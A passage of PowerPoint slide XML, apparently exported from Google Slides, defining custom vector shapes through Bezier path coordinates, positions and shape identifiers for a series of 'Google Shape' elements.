                      <a:pt x="2101" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1941" y="27"/>
                      <a:pt x="1850" y="186"/>
                      <a:pt x="1873" y="346"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1895" y="392"/>
                      <a:pt x="2991" y="5938"/>
                      <a:pt x="92" y="10754"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="10891"/>
                      <a:pt x="47" y="11051"/>
                      <a:pt x="184" y="11142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="229" y="11165"/>
                      <a:pt x="275" y="11188"/>
                      <a:pt x="321" y="11188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="435" y="11188"/>
                      <a:pt x="526" y="11142"/>
                      <a:pt x="572" y="11051"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3607" y="6030"/>
                      <a:pt x="2489" y="460"/>
                      <a:pt x="2443" y="232"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2423" y="89"/>
                      <a:pt x="2292" y="0"/>
                      <a:pt x="2150"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09" name="Google Shape;1287;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83F99E0D-A1C8-23D6-0299-73F21D6FE606}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2119500" y="4071450"/>
                <a:ext cx="77625" cy="223775"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3105" h="8951" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2773" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2631" y="0"/>
                      <a:pt x="2532" y="129"/>
                      <a:pt x="2511" y="277"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2511" y="322"/>
                      <a:pt x="2328" y="4750"/>
                      <a:pt x="91" y="8517"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="8654"/>
                      <a:pt x="46" y="8836"/>
                      <a:pt x="183" y="8905"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="228" y="8950"/>
                      <a:pt x="274" y="8950"/>
                      <a:pt x="320" y="8950"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="434" y="8950"/>
                      <a:pt x="525" y="8905"/>
                      <a:pt x="571" y="8813"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2899" y="4910"/>
                      <a:pt x="3081" y="482"/>
                      <a:pt x="3081" y="299"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3104" y="140"/>
                      <a:pt x="2967" y="3"/>
                      <a:pt x="2808" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2796" y="1"/>
                      <a:pt x="2784" y="0"/>
                      <a:pt x="2773"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10" name="Google Shape;1288;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA3C0B69-E5AF-BEB0-1C72-64144BAFEC1E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1723475" y="2973900"/>
                <a:ext cx="412025" cy="49950"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="16481" h="1998" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="307" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="184" y="0"/>
                      <a:pt x="84" y="85"/>
                      <a:pt x="46" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="377"/>
                      <a:pt x="92" y="514"/>
                      <a:pt x="229" y="560"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="297" y="582"/>
                      <a:pt x="5433" y="1998"/>
                      <a:pt x="11139" y="1998"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12828" y="1998"/>
                      <a:pt x="14563" y="1883"/>
                      <a:pt x="16229" y="1564"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16366" y="1541"/>
                      <a:pt x="16480" y="1381"/>
                      <a:pt x="16457" y="1222"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16416" y="1078"/>
                      <a:pt x="16302" y="990"/>
                      <a:pt x="16163" y="990"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16147" y="990"/>
                      <a:pt x="16131" y="991"/>
                      <a:pt x="16115" y="993"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14479" y="1311"/>
                      <a:pt x="12776" y="1434"/>
                      <a:pt x="11120" y="1434"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5519" y="1434"/>
                      <a:pt x="459" y="29"/>
                      <a:pt x="388" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="360" y="4"/>
                      <a:pt x="333" y="0"/>
                      <a:pt x="307"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11" name="Google Shape;1289;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E01DEDDE-A787-D803-F4D8-13CEB893289F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1632750" y="1843400"/>
                <a:ext cx="200875" cy="193250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="8035" h="7730" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="344" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="227" y="1"/>
                      <a:pt x="105" y="66"/>
                      <a:pt x="69" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="312"/>
                      <a:pt x="69" y="494"/>
                      <a:pt x="228" y="540"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="274" y="563"/>
                      <a:pt x="5113" y="2617"/>
                      <a:pt x="7441" y="7570"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7487" y="7684"/>
                      <a:pt x="7601" y="7730"/>
                      <a:pt x="7715" y="7730"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7738" y="7730"/>
                      <a:pt x="7783" y="7730"/>
                      <a:pt x="7829" y="7707"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7966" y="7639"/>
                      <a:pt x="8035" y="7479"/>
                      <a:pt x="7966" y="7319"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5524" y="2161"/>
                      <a:pt x="639" y="106"/>
                      <a:pt x="434" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="405" y="5"/>
                      <a:pt x="375" y="1"/>
                      <a:pt x="344"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12" name="Google Shape;1290;p52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0761978-9D49-33F8-922E-69B4B4C63518}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2716375" y="1473375"/>
                <a:ext cx="71925" cy="285950"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="2877" h="11438" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2544" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2452" y="0"/>
                      <a:pt x="2365" y="51"/>
                      <a:pt x="2306" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2214" y="322"/>
                      <a:pt x="0" y="4316"/>
                      <a:pt x="2283" y="11255"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2328" y="11369"/>
                      <a:pt x="2443" y="11438"/>
                      <a:pt x="2557" y="11438"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2648" y="11438"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2808" y="11369"/>
                      <a:pt x="2876" y="11210"/>
                      <a:pt x="2831" y="11073"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="617" y="4408"/>
                      <a:pt x="2785" y="459"/>
                      <a:pt x="2808" y="436"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2876" y="299"/>
                      <a:pt x="2831" y="116"/>
                      <a:pt x="2694" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2645" y="16"/>
                      <a:pt x="2594" y="0"/>
                      <a:pt x="2544"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8" name="Google Shape;1291;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D767C2A-F742-04A4-A533-278DC7A73D56}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5361150" y="825225"/>
              <a:ext cx="4764320" cy="3134826"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="241629" h="158987" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="175864" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="156533" y="1"/>
                    <a:pt x="134274" y="10171"/>
                    <a:pt x="115131" y="36138"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88243" y="72590"/>
                    <a:pt x="68704" y="54923"/>
                    <a:pt x="38392" y="65605"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="79141"/>
                    <a:pt x="616" y="128831"/>
                    <a:pt x="40629" y="148210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56330" y="155808"/>
                    <a:pt x="75552" y="158986"/>
                    <a:pt x="95266" y="158986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="134362" y="158986"/>
                    <a:pt x="175391" y="146485"/>
                    <a:pt x="194723" y="131159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232499" y="101235"/>
                    <a:pt x="241629" y="30956"/>
                    <a:pt x="202438" y="7241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="194887" y="2666"/>
                    <a:pt x="185759" y="1"/>
                    <a:pt x="175864" y="1"/>
                  </a:cubicBez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 name="Google Shape;1292;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD846410-3266-2B61-9317-3F4F877BFD21}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5821983" y="1661069"/>
              <a:ext cx="2787680" cy="1910961"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="141381" h="96917" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="4566" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2055" y="0"/>
                    <a:pt x="1" y="2055"/>
                    <a:pt x="1" y="4565"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="92351"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="94862"/>
                    <a:pt x="2055" y="96916"/>
                    <a:pt x="4566" y="96916"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="136816" y="96916"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="139326" y="96916"/>
                    <a:pt x="141381" y="94862"/>
                    <a:pt x="141381" y="92351"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="141381" y="4565"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="141381" y="2055"/>
                    <a:pt x="139326" y="0"/>
                    <a:pt x="136816" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="dk2">
                <a:alpha val="2054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 name="Google Shape;1293;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F0AF3B7-E585-EACC-A883-B2481B87A6F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8163163" y="1391195"/>
              <a:ext cx="176472" cy="219929"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="8950" h="11154" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="5195" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2073" y="0"/>
                    <a:pt x="1" y="6221"/>
                    <a:pt x="481" y="10789"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7557" y="11154"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="4773" y="5790"/>
                    <a:pt x="8950" y="631"/>
                    <a:pt x="5617" y="38"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5474" y="13"/>
                    <a:pt x="5334" y="0"/>
                    <a:pt x="5195"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 name="Google Shape;1294;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7624975A-0095-6382-BB61-B760BC4C2165}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8190649" y="1229827"/>
              <a:ext cx="553589" cy="752144"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="28076" h="38146" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="16680" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13098" y="0"/>
                    <a:pt x="9559" y="2443"/>
                    <a:pt x="8217" y="6989"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5410" y="16530"/>
                    <a:pt x="0" y="21871"/>
                    <a:pt x="0" y="21871"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="17256" y="38146"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17256" y="38146"/>
                    <a:pt x="28075" y="21232"/>
                    <a:pt x="25770" y="9203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24566" y="2920"/>
                    <a:pt x="20597" y="0"/>
                    <a:pt x="16680" y="0"/>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 name="Google Shape;1295;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B53C166E-3157-7B60-E480-F556F599FA2F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8351327" y="1417577"/>
              <a:ext cx="211096" cy="406871"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="10706" h="20635" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="9815" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9655" y="24"/>
                    <a:pt x="9541" y="161"/>
                    <a:pt x="9541" y="320"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9541" y="435"/>
                    <a:pt x="10112" y="11710"/>
                    <a:pt x="137" y="20133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="20224"/>
                    <a:pt x="0" y="20407"/>
                    <a:pt x="91" y="20521"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="20589"/>
                    <a:pt x="228" y="20635"/>
                    <a:pt x="320" y="20635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="388" y="20635"/>
                    <a:pt x="457" y="20612"/>
                    <a:pt x="502" y="20566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10705" y="11961"/>
                    <a:pt x="10112" y="389"/>
                    <a:pt x="10112" y="275"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10112" y="115"/>
                    <a:pt x="9975" y="1"/>
                    <a:pt x="9815"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 name="Google Shape;1296;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C5EDD1F-6079-123C-66A0-D6FC6050C85F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6915635" y="3201162"/>
              <a:ext cx="1281894" cy="753662"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="65013" h="38223" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1005" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="16777"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6698" y="25337"/>
                    <a:pt x="13510" y="25799"/>
                    <a:pt x="21477" y="25799"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22198" y="25799"/>
                    <a:pt x="22929" y="25795"/>
                    <a:pt x="23670" y="25793"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23750" y="25793"/>
                    <a:pt x="23829" y="25792"/>
                    <a:pt x="23909" y="25792"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32775" y="25792"/>
                    <a:pt x="42769" y="28309"/>
                    <a:pt x="47226" y="34010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49181" y="36511"/>
                    <a:pt x="52850" y="38223"/>
                    <a:pt x="56322" y="38223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="60834" y="38223"/>
                    <a:pt x="65013" y="35332"/>
                    <a:pt x="64664" y="27528"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64061" y="14014"/>
                    <a:pt x="44900" y="1877"/>
                    <a:pt x="28978" y="1877"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28630" y="1877"/>
                    <a:pt x="28283" y="1883"/>
                    <a:pt x="27938" y="1895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26313" y="1950"/>
                    <a:pt x="24742" y="1975"/>
                    <a:pt x="23231" y="1975"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9752" y="1975"/>
                    <a:pt x="1005" y="0"/>
                    <a:pt x="1005" y="0"/>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 name="Google Shape;1297;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{349E4D25-2DA7-8E23-6C85-679CB362E035}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6919224" y="3348610"/>
              <a:ext cx="1063956" cy="366529"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="53960" h="18589" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="327" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="0"/>
                    <a:pt x="139" y="52"/>
                    <a:pt x="92" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="283"/>
                    <a:pt x="69" y="466"/>
                    <a:pt x="206" y="534"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12053" y="6651"/>
                    <a:pt x="22415" y="8021"/>
                    <a:pt x="30747" y="9139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40288" y="10395"/>
                    <a:pt x="47820" y="11399"/>
                    <a:pt x="53412" y="18498"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53481" y="18566"/>
                    <a:pt x="53549" y="18589"/>
                    <a:pt x="53640" y="18589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53709" y="18589"/>
                    <a:pt x="53777" y="18589"/>
                    <a:pt x="53823" y="18543"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53937" y="18429"/>
                    <a:pt x="53960" y="18269"/>
                    <a:pt x="53869" y="18132"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48117" y="10874"/>
                    <a:pt x="40493" y="9847"/>
                    <a:pt x="30815" y="8569"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22096" y="7404"/>
                    <a:pt x="12212" y="6103"/>
                    <a:pt x="457" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="415" y="11"/>
                    <a:pt x="370" y="0"/>
                    <a:pt x="327"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 name="Google Shape;1298;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8212E5FD-CF98-DC19-AE62-90FAB839BEDC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5882121" y="1298306"/>
              <a:ext cx="221171" cy="328119"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11217" h="16641" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="5177" y="1"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="756" y="1"/>
                    <a:pt x="1" y="10165"/>
                    <a:pt x="3136" y="16641"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="11217" y="15705"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5305" y="11003"/>
                    <a:pt x="9710" y="115"/>
                    <a:pt x="5236" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5217" y="1"/>
                    <a:pt x="5197" y="1"/>
                    <a:pt x="5177"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 name="Google Shape;1299;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BECECA4C-DB31-33F5-3704-46EE2E11FAF5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5285528" y="1142775"/>
              <a:ext cx="855128" cy="737494"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="43369" h="37403" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="19556" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18727" y="0"/>
                    <a:pt x="17827" y="136"/>
                    <a:pt x="16845" y="425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="5401"/>
                    <a:pt x="17598" y="37402"/>
                    <a:pt x="17598" y="37402"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="43368" y="30235"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="29092" y="24499"/>
                    <a:pt x="30693" y="0"/>
                    <a:pt x="19556" y="0"/>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 name="Google Shape;1300;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DCBEDE2-2834-366B-8B70-A5F3ABC07D35}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5641509" y="1311773"/>
              <a:ext cx="234047" cy="508179"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11870" h="25773" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="293" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="279" y="0"/>
                    <a:pt x="266" y="1"/>
                    <a:pt x="252" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="92" y="26"/>
                    <a:pt x="1" y="163"/>
                    <a:pt x="24" y="323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="459"/>
                    <a:pt x="2146" y="14771"/>
                    <a:pt x="11322" y="25681"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11391" y="25750"/>
                    <a:pt x="11459" y="25773"/>
                    <a:pt x="11550" y="25773"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11596" y="25773"/>
                    <a:pt x="11665" y="25750"/>
                    <a:pt x="11733" y="25704"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11847" y="25613"/>
                    <a:pt x="11870" y="25430"/>
                    <a:pt x="11756" y="25316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2694" y="14543"/>
                    <a:pt x="594" y="391"/>
                    <a:pt x="571" y="231"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="551" y="106"/>
                    <a:pt x="435" y="0"/>
                    <a:pt x="293"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 name="Google Shape;1301;p52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDAAD721-06DD-6454-E434-70197702D391}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
